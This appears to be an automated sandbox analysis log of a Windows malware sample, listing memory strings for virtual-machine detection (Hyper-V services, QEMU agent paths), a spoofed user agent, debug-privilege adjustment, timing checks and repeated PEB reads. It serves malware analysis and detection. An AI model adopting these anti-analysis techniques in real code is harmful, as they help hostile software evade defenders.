        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeAPI call chain: ExitProcess graph end nodegraph_1-4646
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: explorer.exe, 0000000A.00000000.42204571289.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41938326898.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003368146.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42072237105.0000000011F87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWEXE
        Source: aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: aSsc9zh1ex.exe, 00000007.00000003.42236774910.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41892637526.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243111671.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41893076599.0000000001B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWLr^
        Source: aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: aSsc9zh1ex.exe, 00000007.00000003.42236774910.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41892637526.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243111671.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242706672.0000000001AE4000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41893076599.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42236379265.0000000001AE3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41938326898.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003368146.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: explorer.exe, 0000000A.00000000.42204571289.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41938326898.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003368146.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42072237105.0000000011F87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWndow ClasssApps\Microsoft.Windows.Photos_2021.21070.22007.0_x64__8wekyb3d8bbwe\Assets\PhotosLogoExtensions.targetsize-48.png
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_6F001BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F001BFF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77FD40 rdtsc 7_2_1D77FD40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BD71 mov eax, dword ptr fs:[00000030h]7_2_1D77BD71
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BD71 mov eax, dword ptr fs:[00000030h]7_2_1D77BD71
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D755D60 mov eax, dword ptr fs:[00000030h]7_2_1D755D60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C5D60 mov eax, dword ptr fs:[00000030h]7_2_1D7C5D60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C1D5E mov eax, dword ptr fs:[00000030h]7_2_1D7C1D5E
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D741D50 mov eax, dword ptr fs:[00000030h]7_2_1D741D50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D741D50 mov eax, dword ptr fs:[00000030h]7_2_1D741D50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D739D46 mov eax, dword ptr fs:[00000030h]7_2_1D739D46
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D739D46 mov eax, dword ptr fs:[00000030h]7_2_1D739D46
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D739D46 mov ecx, dword ptr fs:[00000030h]7_2_1D739D46
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DD4D mov eax, dword ptr fs:[00000030h]7_2_1D75DD4D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DD4D mov eax, dword ptr fs:[00000030h]7_2_1D75DD4D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DD4D mov eax, dword ptr fs:[00000030h]7_2_1D75DD4D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73FD20 mov eax, dword ptr fs:[00000030h]7_2_1D73FD20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FBD08 mov eax, dword ptr fs:[00000030h]7_2_1D7FBD08
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FBD08 mov eax, dword ptr fs:[00000030h]7_2_1D7FBD08
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h]7_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h]7_2_1D74BDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FDE0 mov eax, dword ptr fs:[00000030h]7_2_1D76FDE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D747DB6 mov eax, dword ptr fs:[00000030h]7_2_1D747DB6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73DDB0 mov eax, dword ptr fs:[00000030h]7_2_1D73DDB0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D805D43 mov eax, dword ptr fs:[00000030h]7_2_1D805D43
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D805D43 mov eax, dword ptr fs:[00000030h]7_2_1D805D43
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D815D65 mov eax, dword ptr fs:[00000030h]7_2_1D815D65
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h]7_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BC6E mov eax, dword ptr fs:[00000030h]7_2_1D77BC6E
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BC6E mov eax, dword ptr fs:[00000030h]7_2_1D77BC6E
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C3C57 mov eax, dword ptr fs:[00000030h]7_2_1D7C3C57
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73DC40 mov eax, dword ptr fs:[00000030h]7_2_1D73DC40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C40 mov eax, dword ptr fs:[00000030h]7_2_1D753C40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D7C38 mov eax, dword ptr fs:[00000030h]7_2_1D7D7C38
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C20 mov eax, dword ptr fs:[00000030h]7_2_1D753C20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737CF1 mov eax, dword ptr fs:[00000030h]7_2_1D737CF1
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743CF0 mov eax, dword ptr fs:[00000030h]7_2_1D743CF0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743CF0 mov eax, dword ptr fs:[00000030h]7_2_1D743CF0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D7CE8 mov eax, dword ptr fs:[00000030h]7_2_1D7D7CE8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DCD1 mov eax, dword ptr fs:[00000030h]7_2_1D75DCD1
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DCD1 mov eax, dword ptr fs:[00000030h]7_2_1D75DCD1
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DCD1 mov eax, dword ptr fs:[00000030h]7_2_1D75DCD1
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h]7_2_1D7D3CD4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h]7_2_1D7D3CD4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D3CD4 mov ecx, dword ptr fs:[00000030h]7_2_1D7D3CD4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h]7_2_1D7D3CD4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h]7_2_1D7D3CD4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C5CD0 mov eax, dword ptr fs:[00000030h]7_2_1D7C5CD0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779CCF mov eax, dword ptr fs:[00000030h]7_2_1D779CCF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D805C38 mov eax, dword ptr fs:[00000030h]7_2_1D805C38
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D805C38 mov ecx, dword ptr fs:[00000030h]7_2_1D805C38
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74FCC9 mov eax, dword ptr fs:[00000030h]7_2_1D74FCC9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D747C95 mov eax, dword ptr fs:[00000030h]7_2_1D747C95
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D747C95 mov eax, dword ptr fs:[00000030h]7_2_1D747C95
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E9C98 mov ecx, dword ptr fs:[00000030h]7_2_1D7E9C98
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E9C98 mov eax, dword ptr fs:[00000030h]7_2_1D7E9C98
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E9C98 mov eax, dword ptr fs:[00000030h]7_2_1D7E9C98
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E9C98 mov eax, dword ptr fs:[00000030h]7_2_1D7E9C98
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FFC95 mov eax, dword ptr fs:[00000030h]7_2_1D7FFC95
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h]7_2_1D737C85
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h]7_2_1D737C85
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h]7_2_1D737C85
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h]7_2_1D737C85
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h]7_2_1D737C85
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C3C80 mov ecx, dword ptr fs:[00000030h]7_2_1D7C3C80
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73BF70 mov eax, dword ptr fs:[00000030h]7_2_1D73BF70
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D741F70 mov eax, dword ptr fs:[00000030h]7_2_1D741F70
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FBF4D mov eax, dword ptr fs:[00000030h]7_2_1D7FBF4D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h]7_2_1D75DF36
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h]7_2_1D75DF36
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h]7_2_1D75DF36
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h]7_2_1D75DF36
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73FF30 mov edi, dword ptr fs:[00000030h]7_2_1D73FF30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFF03 mov eax, dword ptr fs:[00000030h]7_2_1D7BFF03
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFF03 mov eax, dword ptr fs:[00000030h]7_2_1D7BFF03
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFF03 mov eax, dword ptr fs:[00000030h]7_2_1D7BFF03
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BF0C mov eax, dword ptr fs:[00000030h]7_2_1D77BF0C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BF0C mov eax, dword ptr fs:[00000030h]7_2_1D77BF0C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BF0C mov eax, dword ptr fs:[00000030h]7_2_1D77BF0C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D739FD0 mov eax, dword ptr fs:[00000030h]7_2_1D739FD0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h]7_2_1D7BFFDC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h]7_2_1D7BFFDC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h]7_2_1D7BFFDC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFFDC mov ecx, dword ptr fs:[00000030h]7_2_1D7BFFDC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h]7_2_1D7BFFDC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h]7_2_1D7BFFDC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73BFC0 mov eax, dword ptr fs:[00000030h]7_2_1D73BFC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D741FAA mov eax, dword ptr fs:[00000030h]7_2_1D741FAA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76BF93 mov eax, dword ptr fs:[00000030h]7_2_1D76BF93
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D741E70 mov eax, dword ptr fs:[00000030h]7_2_1D741E70
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D777E71 mov eax, dword ptr fs:[00000030h]7_2_1D777E71
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73BE60 mov eax, dword ptr fs:[00000030h]7_2_1D73BE60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73BE60 mov eax, dword ptr fs:[00000030h]7_2_1D73BE60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h]7_2_1D7BDE50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h]7_2_1D7BDE50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BDE50 mov ecx, dword ptr fs:[00000030h]7_2_1D7BDE50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h]7_2_1D7BDE50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h]7_2_1D7BDE50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73FE40 mov eax, dword ptr fs:[00000030h]7_2_1D73FE40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73DE45 mov eax, dword ptr fs:[00000030h]7_2_1D73DE45
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73DE45 mov ecx, dword ptr fs:[00000030h]7_2_1D73DE45
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h]7_2_1D7D5E30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5E30 mov ecx, dword ptr fs:[00000030h]7_2_1D7D5E30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h]7_2_1D7D5E30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h]7_2_1D7D5E30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h]7_2_1D7D5E30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h]7_2_1D7D5E30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D809ED2 mov eax, dword ptr fs:[00000030h]7_2_1D809ED2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743E14 mov eax, dword ptr fs:[00000030h]7_2_1D743E14
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743E14 mov eax, dword ptr fs:[00000030h]7_2_1D743E14
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743E14 mov eax, dword ptr fs:[00000030h]7_2_1D743E14
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h]7_2_1D7BFE1F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h]7_2_1D7BFE1F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h]7_2_1D7BFE1F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h]7_2_1D7BFE1F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73BE18 mov ecx, dword ptr fs:[00000030h]7_2_1D73BE18
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743E01 mov eax, dword ptr fs:[00000030h]7_2_1D743E01
